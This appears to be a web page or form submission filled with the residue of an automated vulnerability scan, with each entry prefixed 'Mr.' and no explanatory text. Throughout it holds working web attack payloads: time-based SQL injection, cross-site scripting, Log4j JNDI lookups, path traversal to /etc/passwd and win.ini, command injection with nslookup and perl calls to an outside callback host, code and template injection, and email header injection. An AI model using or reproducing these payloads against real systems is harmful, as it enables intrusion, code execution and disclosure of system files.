&#xD;&#xA;

Mr.dO0S9 <ScRiPt >jKTQ(9524)</ScRiPt>

&#xD;&#xA;

Mr.<WQAYN7>SYSKE[!+!]</WQAYN7>

&#xD;&#xA;

Mr.

AAg51n07'); waitfor delay '0:0:15' --

Mr.<ifRAme sRc=9664.com></IfRamE>

&#xD;&#xA;

Mr.<a0ITBOV x=9606>

&#xD;&#xA;

Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.<img sRc='http://attacker-9865/log.php?

&#xD;&#xA;

Mr.

@@EpBNR

Mr.<aHFRiAV<

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

fLhyHtPo')); waitfor delay '0:0:15' --

Mr.

aUTvxNOO' OR 46=(SELECT 46 FROM PG_SLEEP(15))--

Mr.

6YArlRlT') OR 441=(SELECT 441 FROM PG_SLEEP(15))--

Mr.

H0SnhjNn')) OR 67=(SELECT 67 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.

@@FQjXf

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

-1 OR 2+331-331-1=0+0+0+1 --

&#xD;&#xA;

-1 OR 2+118-118-1=0+0+0+1

&#xD;&#xA;

-1' OR 2+182-182-1=0+0+0+1 --

&#xD;&#xA;

-1' OR 2+290-290-1=0+0+0+1 or 'agtQaeIi'='

&#xD;&#xA;

-1" OR 2+935-935-1=0+0+0+1 --

&#xD;&#xA;

if(now()=sysdate(),sleep(15),0)

&#xD;&#xA;

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

&#xD;&#xA;

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

&#xD;&#xA;

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

&#xD;&#xA;

1 waitfor delay '0:0:15' --

&#xD;&#xA;

SduDIwGm'; waitfor delay '0:0:15' --

&#xD;&#xA;

QnYZZdmi'); waitfor delay '0:0:15' --

&#xD;&#xA;

K93AVuGA')); waitfor delay '0:0:15' --

&#xD;&#xA;

zKy6Nj71' OR 617=(SELECT 617 FROM PG_SLEEP(15))--

&#xD;&#xA;

gHnO5W3Q') OR 871=(SELECT 871 FROM PG_SLEEP(15))--

&#xD;&#xA;

58IJAh5u')) OR 292=(SELECT 292 FROM PG_SLEEP(15))--

&#xD;&#xA;

Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

&#xD;&#xA;

1'"

&#xD;&#xA;

@@CQxGr

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

'"()&%<zzz><ScRiPt >B5rs(9202)</ScRiPt>

Mr.

'"()&%<zzz><ScRiPt >B5rs(9540)</ScRiPt>

Mr.

${j${::-n}di:dns${::-:}${::-/}/hittaknfongcvc6591${::-.}bxss.me}zzzz

Mr.

response.write(9774810*9863047)

Mr.

'+response.write(9774810*9863047)+'

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitchyimozqnt8a86d${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

"+response.write(9774810*9863047)+"

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-220770.58.cafd8${::-.}1${::-.}bxss.me}}

Mr.

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-220953&h=58-cafd8-2&"></script>

Mr.

9859560

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

ChGzdo34

Mr.

echo yodsws$()\ badggp\nz^xyu||a #' &echo yodsws$()\ badggp\nz^xyu||a #|" &echo yodsws$()\ badggp\nz^xyu||a #

Mr.

bfg5062<s1﹥s2ʺs3ʹhjl5062

Mr.

&echo afyyfu$()\ gjmzjh\nz^xyu||a #' &echo afyyfu$()\ gjmzjh\nz^xyu||a #|" &echo afyyfu$()\ gjmzjh\nz^xyu||a #

Mr.

|echo eobtbv$()\ usjlcf\nz^xyu||a #' |echo eobtbv$()\ usjlcf\nz^xyu||a #|" |echo eobtbv$()\ usjlcf\nz^xyu||a #

Mr.

(nslookup hitemwsvdksxg5807d.bxss.me||perl -e "gethostbyname('hitemwsvdksxg5807d.bxss.me')")

Mr.

$(nslookup hitnknwbzkamda8f2a.bxss.me||perl -e "gethostbyname('hitnknwbzkamda8f2a.bxss.me')")

Mr.

bfgx3510%C0%BEz1%C0%BCz2a%90bcxhjl3510

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

&(nslookup hitrauchmoekm661b2.bxss.me||perl -e "gethostbyname('hitrauchmoekm661b2.bxss.me')")&'\"`0&(nslookup hitrauchmoekm661b2.bxss.me||perl -e "gethostbyname('hitrauchmoekm661b2.bxss.me')")&`'

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

|(nslookup hitigxixbfficd84ad.bxss.me||perl -e "gethostbyname('hitigxixbfficd84ad.bxss.me')")

Mr.

file:///etc/passwd

Mr.

`(nslookup hitxdxqefyfxt62a3d.bxss.me||perl -e "gethostbyname('hitxdxqefyfxt62a3d.bxss.me')")`

Mr.

bcc:074625.58-220958.58.cafd8.19244.2@bxss.me

Mr.

to@example.com>
bcc:074625.58-220959.58.cafd8.19244.2@bxss.me

Mr.

;(nslookup hitsenbdcvmie6e0eb.bxss.me||perl -e "gethostbyname('hitsenbdcvmie6e0eb.bxss.me')")|(nslookup hitsenbdcvmie6e0eb.bxss.me||perl -e "gethostbyname('hitsenbdcvmie6e0eb.bxss.me')")&(nslookup hitsenbdcvmie6e0eb.bxss.me||perl -e "gethostbyname('hitsenbdcvmie6e0eb.bxss.me')")

Mr.

../

Mr.

<%={{={@{#{${dfb}}%>

Mr.

./

Mr.

<th:t="${dfb}#foreach

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

${9999216+9999413}

Mr.

dfb[[${98991*97996}]]xca

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

/etc/shells

Mr.

dfb__${98991*97996}__::.x

Mr.

c:/windows/win.ini

Mr.

&n924141=v964719

Mr.

bxss.me

Mr.

-1 OR 2+639-639-1=0+0+0+1 --

Mr.

-1 OR 3+639-639-1=0+0+0+1 --

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

-1 OR 2+355-355-1=0+0+0+1

Mr.

-1 OR 3+355-355-1=0+0+0+1

Mr.

-1' OR 2+635-635-1=0+0+0+1 --

Mr.

-1' OR 3+635-635-1=0+0+0+1 --

Mr.

-1' OR 2+936-936-1=0+0+0+1 or 'cm0KGTGJ'='

Mr.

)

Mr.

-1' OR 3+936-936-1=0+0+0+1 or 'cm0KGTGJ'='

Mr.

!(()&&!|*|*|

Mr.

<ScRiPt >B5rs(9000)</ScRiPt>

Mr.

-1" OR 2+517-517-1=0+0+0+1 --

Mr.

^(#$!@#$)(()))******

Mr.

-1" OR 3+517-517-1=0+0+0+1 --

Mr.

<WVTKUY>KNDPG[!+!]</WVTKUY>

Mr.

'"()

Mr.

<script>B5rs(9755)</script>

Mr.

'.gethostbyname(lc('hitbl'.'uhapvlct509e6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(86).chr(118).chr(68).'

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

".gethostbyname(lc("hitft"."pilhfpoj5e077.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(65).chr(116).chr(74)."

Mr.

';print(md5(31337));$a='

Mr.

'&&sleep(27*1000)*xljucm&&'

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

";print(md5(31337));$a="

Mr.

"&&sleep(27*1000)*ksxacb&&"

Mr.

<ScR<ScRiPt>IpT>B5rs(9157)</sCr<ScRiPt>IpT>

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

${@print(md5(31337))}

Mr.

'||sleep(27*1000)*fnyzcd||'

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitbcnsewrcml0a841.'+'bxss.me')

Mr.

bxss.me/t/xss.html?%00

Mr.

${@print(md5(31337))}\

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitbcnsewrcml0a841."+"bxss.me")+'

Mr.

'.print(md5(31337)).'

Mr.

"+"A".concat(70-3).concat(22*4).concat(122).concat(67).concat(116).concat(85)+(require"socket"
Socket.gethostbyname("hitqf"+"fwtzftkb56c51.bxss.me.")[3].to_s)+"

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitbcnsewrcml0a841.'+'bxss.me')+"

Mr.

"||sleep(27*1000)*tnzndv||"

Mr.

'+'A'.concat(70-3).concat(22*4).concat(105).concat(87).concat(112).concat(72)+(require'socket'
Socket.gethostbyname('hityv'+'gsvoslsf43f8d.bxss.me.')[3].to_s)+'

Mr.

<ScRiPt
>B5rs(9691)</ScRiPt>

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7

Mr.

http://hitvtuuzfodnd.bxss.me/

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7/.

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9564></ScRiPt>

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

/xfs.bxss.me

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

'"

Mr.

'"()&%<zzz><ScRiPt >AYXV(9275)</ScRiPt>

Mr.

<!--

Mr.

'"()&%<zzz><ScRiPt >AYXV(9937)</ScRiPt>

Mr.

9665488

Mr.

<isindex type=image src=1 onerror=B5rs(9573)>

Mr.

bfg2040<s1﹥s2ʺs3ʹhjl2040

Mr.

bfgx6829%C0%BEz1%C0%BCz2a%90bcxhjl6829

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9822'>

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<body onload=B5rs(9557)>

Mr.

<th:t="${dfb}#foreach

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=B5rs(9439)>

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

<img src=xyz OnErRor=B5rs(9013)>

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

<img/src=">" onerror=alert(9831)>

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%42%35%72%73%289190%29%3C%2F%73%43%72%69%70%54%3E

Mr.

<ScRiPt >AYXV(9264)</ScRiPt>

Mr.

<WO22LW>ICSMZ[!+!]</WO22LW>

Mr.

\u003CScRiPt\B5rs(9683)\u003C/sCripT\u003E

Mr.

<script>AYXV(9568)</script>

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

<ScR<ScRiPt>IpT>AYXV(9029)</sCr<ScRiPt>IpT>

Mr.

&lt;ScRiPt&gt;B5rs(9744)&lt;/sCripT&gt;

Mr.

<ScRiPt
>AYXV(9299)</ScRiPt>

Mr.

%F6<img zzz onmouseover=B5rs(91471) //%F6>

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9673></ScRiPt>

Mr.

<input autofocus onfocus=B5rs(9677)>

Mr.

<isindex type=image src=1 onerror=AYXV(9388)>

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9701'>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

<body onload=AYXV(9417)>

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=AYXV(9751)>

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

<img src=xyz OnErRor=AYXV(9350)>

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

<img/src=">" onerror=alert(9593)>

Mr.

}body{zzz:Expre/**/SSion(B5rs(9848))}

Mr.

GLTo9
<ScRiPt >B5rs(9031)</ScRiPt>

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%41%59%58%56%289842%29%3C%2F%73%43%72%69%70%54%3E

Mr.

<WVPURB>TYYYY[!+!]</WVPURB>

Mr.

\u003CScRiPt\AYXV(9414)\u003C/sCripT\u003E

Mr.

&lt;ScRiPt&gt;AYXV(9931)&lt;/sCripT&gt;

Mr.

<ifRAme sRc=9592.com></IfRamE>

Mr.

%F6<img zzz onmouseover=AYXV(99591) //%F6>

Mr.

<input autofocus onfocus=AYXV(9213)>

Mr.

<am6XGkM x=9530>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

<img sRc='http://attacker-9451/log.php?

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

}body{zzz:Expre/**/SSion(AYXV(9774))}

Mr.

-1; waitfor delay '0:0:15' --

Mr.

Ly0zu
<ScRiPt >AYXV(9866)</ScRiPt>

Mr.

<a6LLjYD<

Mr.

<WNN9PT>S1MYX[!+!]</WNN9PT>

Mr.

<ifRAme sRc=9019.com></IfRamE>

Mr.

<aIsIN5D x=9353>

Mr.

<img sRc='http://attacker-9718/log.php?

Mr.

<aYjQHw1<

Mr.

-1); waitfor delay '0:0:15' --

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

Mr.

OhP8iL4z'; waitfor delay '0:0:15' --

Mr.

cNuRyYc9'); waitfor delay '0:0:15' --

Mr.

AqRAJC2N')); waitfor delay '0:0:15' --

Mr.

-5 OR 505=(SELECT 505 FROM PG_SLEEP(15))--

Mr.

-5) OR 100=(SELECT 100 FROM PG_SLEEP(15))--

Mr.

-1)) OR 765=(SELECT 765 FROM PG_SLEEP(15))--

Mr.

Mn011eER' OR 344=(SELECT 344 FROM PG_SLEEP(15))--

Mr.

6WC6nSQ5') OR 532=(SELECT 532 FROM PG_SLEEP(15))--

Mr.

KDKedeGq')) OR 474=(SELECT 474 FROM PG_SLEEP(15))--

Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.

@@TD5OP

Mr.

1CtnT9pQ3QO

Mr.

response.write(9693465*9617509)

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

'+response.write(9693465*9617509)+'

Mr.

"+response.write(9693465*9617509)+"

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

echo stqgas$()\ efvmvr\nz^xyu||a #' &echo stqgas$()\ efvmvr\nz^xyu||a #|" &echo stqgas$()\ efvmvr\nz^xyu||a #

Mr.

wb6qmicX

Mr.

&echo wepjio$()\ meuclu\nz^xyu||a #' &echo wepjio$()\ meuclu\nz^xyu||a #|" &echo wepjio$()\ meuclu\nz^xyu||a #

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

file:///etc/passwd

Mr.

|echo kfpicv$()\ fmsmgr\nz^xyu||a #' |echo kfpicv$()\ fmsmgr\nz^xyu||a #|" |echo kfpicv$()\ fmsmgr\nz^xyu||a #

Mr.

(nslookup hitxpwdravmuwf7185.bxss.me||perl -e "gethostbyname('hitxpwdravmuwf7185.bxss.me')")

Mr.

$(nslookup hittcjsmemasx3ad4a.bxss.me||perl -e "gethostbyname('hittcjsmemasx3ad4a.bxss.me')")

Mr.

&nslookup hitwumimyvmfge86a5.bxss.me&'\"`0&nslookup hitwumimyvmfge86a5.bxss.me&`'

Mr.

&(nslookup hitrzalsqptas945ea.bxss.me||perl -e "gethostbyname('hitrzalsqptas945ea.bxss.me')")&'\"`0&(nslookup hitrzalsqptas945ea.bxss.me||perl -e "gethostbyname('hitrzalsqptas945ea.bxss.me')")&`'

Mr.

../

Mr.

|(nslookup hitksjavwsxcg67a14.bxss.me||perl -e "gethostbyname('hitksjavwsxcg67a14.bxss.me')")

Mr.

./

Mr.

`(nslookup hitkwujolfqrf8ee31.bxss.me||perl -e "gethostbyname('hitkwujolfqrf8ee31.bxss.me')")`

Mr.

;(nslookup hitheoonthrjg98f12.bxss.me||perl -e "gethostbyname('hitheoonthrjg98f12.bxss.me')")|(nslookup hitheoonthrjg98f12.bxss.me||perl -e "gethostbyname('hitheoonthrjg98f12.bxss.me')")&(nslookup hitheoonthrjg98f12.bxss.me||perl -e "gethostbyname('hitheoonthrjg98f12.bxss.me')")

Mr.

bcc:074625.207-121365.207.1b092.19347.2@bxss.me

Mr.

to@example.com>
bcc:074625.207-121366.207.1b092.19347.2@bxss.me

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

${9999299+10000259}

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

&n907482=v941703

Mr.

/etc/shells

Mr.

c:/windows/win.ini

Mr.

bxss.me

Mr.

)

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

Mr.

'"()

Mr.

'&&sleep(27*1000)*jkvfmq&&'

Mr.

'.gethostbyname(lc('hitrf'.'ijaxmvly6a9bf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(67).chr(107).chr(87).'

Mr.

"&&sleep(27*1000)*zisnxb&&"

Mr.

".gethostbyname(lc("hityh"."xckarpvme8adf.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(65).chr(105).chr(86)."

Mr.

'||sleep(27*1000)*qsmykq||'

Mr.

"||sleep(27*1000)*biudqm||"

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

';print(md5(31337));$a='

Mr.

";print(md5(31337));$a="

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

${@print(md5(31337))}

Mr.

"+"A".concat(70-3).concat(22*4).concat(121).concat(66).concat(100).concat(82)+(require"socket"
Socket.gethostbyname("hitgd"+"msihjjrbf39c5.bxss.me.")[3].to_s)+"

Mr.

bxss.me/t/xss.html?%00

Mr.

'+'A'.concat(70-3).concat(22*4).concat(113).concat(76).concat(119).concat(89)+(require'socket'
Socket.gethostbyname('hitgt'+'qarvqwqxe02c0.bxss.me.')[3].to_s)+'

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

Mr.

-1 OR 2+201-201-1=0+0+0+1 --

Mr.

-1 OR 3+201-201-1=0+0+0+1 --

Mr.

-1 OR 2+502-502-1=0+0+0+1

Mr.

-1 OR 3+502-502-1=0+0+0+1

Mr.

-1' OR 2+285-285-1=0+0+0+1 --

Mr.

-1' OR 3+285-285-1=0+0+0+1 --

Mr.

-1' OR 2+785-785-1=0+0+0+1 or 'd5R40QnR'='

Mr.

-1' OR 3+785-785-1=0+0+0+1 or 'd5R40QnR'='

Mr.

-1" OR 2+80-80-1=0+0+0+1 --

Mr.

-1" OR 3+80-80-1=0+0+0+1 --

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

%D9%81%D9%88%D8%B1%D8%AA%D9%86%D8%A7%D9%8A%D8%AA-%D8%AA%D8%AD%D8%AA%D9%81%D9%84-%D8%A8%D8%A7%D9%82%D8%AA%D8%B1%D8%A7%D8%A8-%D8%A5%D8%B7%D9%84%D8%A7%D9%82-%D9%81%D9%8A%D9%84%D9%85-uncharted-%D8%B9%D9%84%D9%89-%D8%B7%D8%B1%D9%8A%D9%82%D8%AA%D9%87%D8%A7/.

Mr.

xfs.bxss.me

Mr.

'"

Mr.

<!--

Mr.

'"()&%<zzz><ScRiPt >dKZS(9578)</ScRiPt>

Mr.

'"()&%<zzz><ScRiPt >dKZS(9328)</ScRiPt>

Mr.

9901611

Mr.

bfg8430<s1﹥s2ʺs3ʹhjl8430

Mr.

bfgx4687%C0%BEz1%C0%BCz2a%90bcxhjl4687

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<th:t="${dfb}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

<ScRiPt >dKZS(9080)</ScRiPt>

Mr.

<WTGYXU>TRSIW[!+!]</WTGYXU>

Mr.

<script>dKZS(9712)</script>

Mr.

<ScR<ScRiPt>IpT>dKZS(9005)</sCr<ScRiPt>IpT>

Mr.

<ScRiPt
>dKZS(9455)</ScRiPt>

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9610></ScRiPt>

Mr.

<isindex type=image src=1 onerror=dKZS(9098)>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9726'>

Mr.

<body onload=dKZS(9000)>

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=dKZS(9690)>

Mr.

<img src=xyz OnErRor=dKZS(9273)>

Mr.

<img/src=">" onerror=alert(9399)>

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%64%4B%5A%53%289151%29%3C%2F%73%43%72%69%70%54%3E

Mr.

\u003CScRiPt\dKZS(9648)\u003C/sCripT\u003E

Mr.

&lt;ScRiPt&gt;dKZS(9078)&lt;/sCripT&gt;

Mr.

%F6<img zzz onmouseover=dKZS(98601) //%F6>

Mr.

<input autofocus onfocus=dKZS(9124)>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

}body{zzz:Expre/**/SSion(dKZS(9605))}

Mr.

vKhTX
<ScRiPt >dKZS(9771)</ScRiPt>

Mr.

<WPYCYD>CIGHS[!+!]</WPYCYD>

Mr.

<ifRAme sRc=9513.com></IfRamE>

Mr.

<aEv2HWW x=9327>

Mr.

<img sRc='http://attacker-9330/log.php?

Mr.

<aEJsVuz<

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

-1; waitfor delay '0:0:15' --

Mr.

-1); waitfor delay '0:0:15' --

Mr.

&#xD;&#xA;

Mr.

'"()&%<zzz><ScRiPt >Mcvd(9954)</ScRiPt>

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

response.write(9828686*9292628)

Mr.

'+response.write(9828686*9292628)+'

Mr.

"+response.write(9828686*9292628)+"

Mr.

&#xD;&#xA;

Mr.

'"()&%<zzz><ScRiPt >Mcvd(9201)</ScRiPt>

response.write(9513778*9464579)

&#xD;&#xA;

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

'+response.write(9513778*9464579)+'

&#xD;&#xA;

/../../../../../../../../../../windows/system32/BITSADMIN.exe

&#xD;&#xA;

"+response.write(9513778*9464579)+"

&#xD;&#xA;

Mr.

echo ywgsml$()\ gtmkmk\nz^xyu||a #' &echo ywgsml$()\ gtmkmk\nz^xyu||a #|" &echo ywgsml$()\ gtmkmk\nz^xyu||a #

Mr.

&echo dolmjr$()\ ctejos\nz^xyu||a #' &echo dolmjr$()\ ctejos\nz^xyu||a #|" &echo dolmjr$()\ ctejos\nz^xyu||a #

Mr.

&#xD;&#xA;

Mr.

|echo drvlxg$()\ llsoqu\nz^xyu||a #' |echo drvlxg$()\ llsoqu\nz^xyu||a #|" |echo drvlxg$()\ llsoqu\nz^xyu||a #

Mr.

9449300

Mr.

(nslookup hitcxihgwcqzz12777.bxss.me||perl -e "gethostbyname('hitcxihgwcqzz12777.bxss.me')")

Mr.

$(nslookup hituhdvdigmzu47165.bxss.me||perl -e "gethostbyname('hituhdvdigmzu47165.bxss.me')")

Mr.

&nslookup hitvudkutxzyiefa85.bxss.me&'\"`0&nslookup hitvudkutxzyiefa85.bxss.me&`'

Mr.

yR8U52lA

Mr.

&(nslookup hitlnoorlbgcy71f7c.bxss.me||perl -e "gethostbyname('hitlnoorlbgcy71f7c.bxss.me')")&'\"`0&(nslookup hitlnoorlbgcy71f7c.bxss.me||perl -e "gethostbyname('hitlnoorlbgcy71f7c.bxss.me')")&`'

tfjKeZdp

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

|(nslookup hittyzkmxfdqpea1d3.bxss.me||perl -e "gethostbyname('hittyzkmxfdqpea1d3.bxss.me')")

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

`(nslookup hitctfqmlabtdc6a20.bxss.me||perl -e "gethostbyname('hitctfqmlabtdc6a20.bxss.me')")`

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

;(nslookup hitnjhpeomuild2ac9.bxss.me||perl -e "gethostbyname('hitnjhpeomuild2ac9.bxss.me')")|(nslookup hitnjhpeomuild2ac9.bxss.me||perl -e "gethostbyname('hitnjhpeomuild2ac9.bxss.me')")&(nslookup hitnjhpeomuild2ac9.bxss.me||perl -e "gethostbyname('hitnjhpeomuild2ac9.bxss.me')")